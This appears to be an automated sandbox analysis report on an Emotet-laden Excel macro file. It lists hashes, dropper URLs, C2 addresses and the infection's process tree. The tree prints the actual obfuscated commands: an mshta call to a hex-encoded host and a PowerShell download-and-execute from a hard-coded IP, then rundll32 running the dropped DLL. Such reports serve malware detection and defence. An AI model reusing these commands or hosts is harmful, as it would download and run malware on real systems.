Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    20-01-2022 07:22

General

  • Target

    93660-5554203.xlsm

  • Size

    115KB

  • MD5

    d5b31c6b64e9d8301335eab74bd9962f

  • SHA1

    1d2f396131f003ad2e23201b7e2661b5dd3a788b

  • SHA256

    a75d803a646fa5cfa41b0489c6de355e62319450b46d41792b4b5b3cd21a0dc3

  • SHA512

    f4b100e44b95411bbfb8d1daccbf27dac19cd6cc32ac6341deb5aaebfadf3a12460486c89b07992577bbc030c69df4af55df48c42b36b72299248eb233fba4c1

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\93660-5554203.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3992
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1896
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:3384
        • C:\Windows\system32\mshta.exe
          mshta http://0x5cff39c3/sec/se1.html
          3⤵
          • Blocklisted process makes network request
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4080
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1284
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:820
              • C:\Windows\SysWow64\rundll32.exe
                C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
                6⤵
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2780
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                  7⤵
                  • Loads dropped DLL
                  • Drops file in System32 directory
                  • Suspicious use of WriteProcessMemory
                  PID:1612
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xfbcrxxmhzxlfzjp\xjfedysep.ywc",oCzdlc
                    8⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:2592
                    • C:\Windows\SysWOW64\rundll32.exe
                      C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Xfbcrxxmhzxlfzjp\xjfedysep.ywc",DllRegisterServer
                      9⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4032
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 4080 -s 1732
            4⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:3380
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
      1⤵
        PID:2808
      • C:\Windows\System32\WaaSMedicAgent.exe
        C:\Windows\System32\WaaSMedicAgent.exe 0cfea3a7418c97d5bc6b84be4ecd5707 pENXZnoQfkS8lHBIlpwrEQ.0.1.0.0.0
        1⤵
        • Modifies data under HKEY_USERS
        PID:2140
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k PrintWorkflow
        1⤵
          PID:1312
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -pss -s 408 -p 4080 -ip 4080
          1⤵
          • Suspicious use of NtCreateProcessExOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:3876
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k wusvcs -p
          1⤵
            PID:3856

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Public\Documents\ssd.dll

            MD5

            f8abfcd6b2735aba706f562332a9a5db

            SHA1

            4253785b8f4c4f6d02803d566f4da7834c623be5

            SHA256

            233a11102c85ff2313b92bcd83086055383564540d6d5fa3c34b022ac9b09f61

            SHA512

            328221b92f4c1a892914c5e843e1d65aabf5be0dadb707fa2797c42bcfb37cc5344773611be559aa98371d6c6f6c01f44634f68ac0b9e392655def501120bba9

          • C:\Users\Public\Documents\ssd.dll

            MD5

            f8abfcd6b2735aba706f562332a9a5db

            SHA1

            4253785b8f4c4f6d02803d566f4da7834c623be5

            SHA256

            233a11102c85ff2313b92bcd83086055383564540d6d5fa3c34b022ac9b09f61

            SHA512

            328221b92f4c1a892914c5e843e1d65aabf5be0dadb707fa2797c42bcfb37cc5344773611be559aa98371d6c6f6c01f44634f68ac0b9e392655def501120bba9

          • C:\Users\Public\Documents\ssd.dll

            MD5

            f8abfcd6b2735aba706f562332a9a5db

            SHA1

            4253785b8f4c4f6d02803d566f4da7834c623be5

            SHA256

            233a11102c85ff2313b92bcd83086055383564540d6d5fa3c34b022ac9b09f61

            SHA512

            328221b92f4c1a892914c5e843e1d65aabf5be0dadb707fa2797c42bcfb37cc5344773611be559aa98371d6c6f6c01f44634f68ac0b9e392655def501120bba9

          • C:\Windows\SysWOW64\Xfbcrxxmhzxlfzjp\xjfedysep.ywc

            MD5

            f8abfcd6b2735aba706f562332a9a5db

            SHA1

            4253785b8f4c4f6d02803d566f4da7834c623be5

            SHA256

            233a11102c85ff2313b92bcd83086055383564540d6d5fa3c34b022ac9b09f61

            SHA512

            328221b92f4c1a892914c5e843e1d65aabf5be0dadb707fa2797c42bcfb37cc5344773611be559aa98371d6c6f6c01f44634f68ac0b9e392655def501120bba9

          • C:\Windows\SysWOW64\Xfbcrxxmhzxlfzjp\xjfedysep.ywc

            MD5

            f8abfcd6b2735aba706f562332a9a5db

            SHA1

            4253785b8f4c4f6d02803d566f4da7834c623be5

            SHA256

            233a11102c85ff2313b92bcd83086055383564540d6d5fa3c34b022ac9b09f61

            SHA512

            328221b92f4c1a892914c5e843e1d65aabf5be0dadb707fa2797c42bcfb37cc5344773611be559aa98371d6c6f6c01f44634f68ac0b9e392655def501120bba9

          • memory/1284-761-0x000001DAA2BF0000-0x000001DAA2D30000-memory.dmp

            Filesize

            1.2MB

          • memory/1284-734-0x000001DAA2D50000-0x000001DAA2D72000-memory.dmp

            Filesize

            136KB

          • memory/1284-763-0x000001DAA2BF0000-0x000001DAA2D30000-memory.dmp

            Filesize

            1.2MB

          • memory/1284-764-0x000001DAA2BF0000-0x000001DAA2D30000-memory.dmp

            Filesize

            1.2MB

          • memory/1284-770-0x000001DABB020000-0x000001DABB064000-memory.dmp

            Filesize

            272KB

          • memory/1284-1193-0x000001DABB670000-0x000001DABB6E6000-memory.dmp

            Filesize

            472KB

          • memory/1612-1196-0x0000000005290000-0x00000000052B8000-memory.dmp

            Filesize

            160KB

          • memory/1612-1203-0x0000000005700000-0x0000000005728000-memory.dmp

            Filesize

            160KB

          • memory/1612-1200-0x0000000005480000-0x00000000054A8000-memory.dmp

            Filesize

            160KB

          • memory/1612-1198-0x0000000005420000-0x0000000005448000-memory.dmp

            Filesize

            160KB

          • memory/1612-1191-0x0000000004AA0000-0x0000000004AC8000-memory.dmp

            Filesize

            160KB

          • memory/1612-1194-0x00000000051A0000-0x00000000051C8000-memory.dmp

            Filesize

            160KB

          • memory/2592-1205-0x0000000003810000-0x0000000003838000-memory.dmp

            Filesize

            160KB

          • memory/3992-137-0x00007FFC13980000-0x00007FFC13990000-memory.dmp

            Filesize

            64KB

          • memory/3992-133-0x00007FFC15C50000-0x00007FFC15C60000-memory.dmp

            Filesize

            64KB

          • memory/3992-134-0x00007FFC15C50000-0x00007FFC15C60000-memory.dmp

            Filesize

            64KB

          • memory/3992-132-0x00007FFC15C50000-0x00007FFC15C60000-memory.dmp

            Filesize

            64KB

          • memory/3992-138-0x00007FFC13980000-0x00007FFC13990000-memory.dmp

            Filesize

            64KB

          • memory/3992-130-0x00007FFC15C50000-0x00007FFC15C60000-memory.dmp

            Filesize

            64KB

          • memory/3992-131-0x00007FFC15C50000-0x00007FFC15C60000-memory.dmp

            Filesize

            64KB

          • memory/4032-1210-0x00000000047D0000-0x00000000047F8000-memory.dmp

            Filesize

            160KB

          • memory/4032-1212-0x0000000004AB0000-0x0000000004AD8000-memory.dmp

            Filesize

            160KB

          • memory/4032-1214-0x0000000004B10000-0x0000000004B38000-memory.dmp

            Filesize

            160KB

          • memory/4032-1216-0x0000000004BF0000-0x0000000004C18000-memory.dmp

            Filesize

            160KB

          • memory/4032-1218-0x0000000004D00000-0x0000000004D28000-memory.dmp

            Filesize

            160KB

          • memory/4032-1220-0x0000000004E30000-0x0000000004E58000-memory.dmp

            Filesize

            160KB

          • memory/4032-1222-0x0000000004F10000-0x0000000004F38000-memory.dmp

            Filesize

            160KB